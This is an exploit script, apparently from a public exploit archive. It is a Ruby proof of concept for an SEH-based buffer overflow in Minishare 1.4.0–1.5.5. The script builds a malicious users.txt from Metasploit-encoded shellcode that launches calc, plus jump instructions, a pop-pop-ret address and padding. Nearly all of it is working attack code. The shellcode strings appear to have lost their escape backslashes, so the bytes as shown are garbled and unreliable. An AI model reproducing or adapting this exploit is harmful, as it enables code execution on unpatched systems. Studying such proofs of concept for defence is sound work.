# Exploit Title: Minishare 1.5.5 Buffer Overflow Vulnerability (SEH)
# Date: 11/03/2010
# Author: Muhamad Fadzil Ramli - mind1355[at]gmail[dot]com
# Credit/Bug Found By: Chris Gabriel
# Software Link: http://sourceforge.net/projects/minishare
# Version: 1.4.0 - 1.5.5
# Tested on: Windows XP SP3 EN (VMWARE FUSION - Version 3.1.1)
# CVE: N/A
 
#! /usr/bin/env ruby
filename = 'users.txt'

# windows/exec - 144 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
shellcode = ''
shellcode <<  "xdbxc0x31xc9xbfx7cx16x70xcc"
shellcode << "xd9x74x24xf4xb1x1ex58x31x78"
shellcode << "x18x83xe8xfcx03x78x68xf4x85"
shellcode << "x30x78xbcx65xc9x78xb6x23xf5"
shellcode << "xf3xb4xaex7dx02xaax3ax32x1c"
shellcode << "xbfx62xedx1dx54xd5x66x29x21"
shellcode << "xe7x96x60xf5x71xcax06x35xf5"
shellcode << "x14xc7x7cxfbx1bx05x6bxf0x27"
shellcode << "xddx48xfdx22x38x1bxa2xe8xc3"
shellcode << "xf7x3bx7axcfx4cx4fx23xd3x53"
shellcode << "xa4x57xf7xd8x3bx83x8ex83x1f"
shellcode << "x57x53x64x51xa1x33xcdxf5xc6"
shellcode << "xf5xc1x7ex98xf5xaaxf1x05xa8"
shellcode << "x26x99x3dx3bxc0xd9xfex51x61"
shellcode << "xb6x0ex2fx85x19x87xb7x78x2f"
shellcode << "x59x90x7bxd7x05x7fxe8x7bxca"

nearjmp = "xe9x98xfexffxff" # near jmp 168 bytes
nseh	= [0xfffff9eb].pack('V') # short jmp 7 bytes
seh		= [0x0040B145].pack('V') # ppr

junk1 	= "x90" * (386 - (shellcode + nearjmp).length)
junk2	= 'B' * (1000 - (junk1 + shellcode + nearjmp + nseh + seh).length)

# [nops][ shellcode][near jmp][nseh (short jmp)][seh (pop pop ret)][junk2]
# (3)^                (2)^_______|_______| ^                |(1)
#    |___________________________|         |________________|

xploit = junk1 + shellcode + nearjmp + nseh + seh + junk2

File.open(filename,'w') do |fd|
	fd.write xploit
	puts "file size	: #{xploit.length.to_s}"
end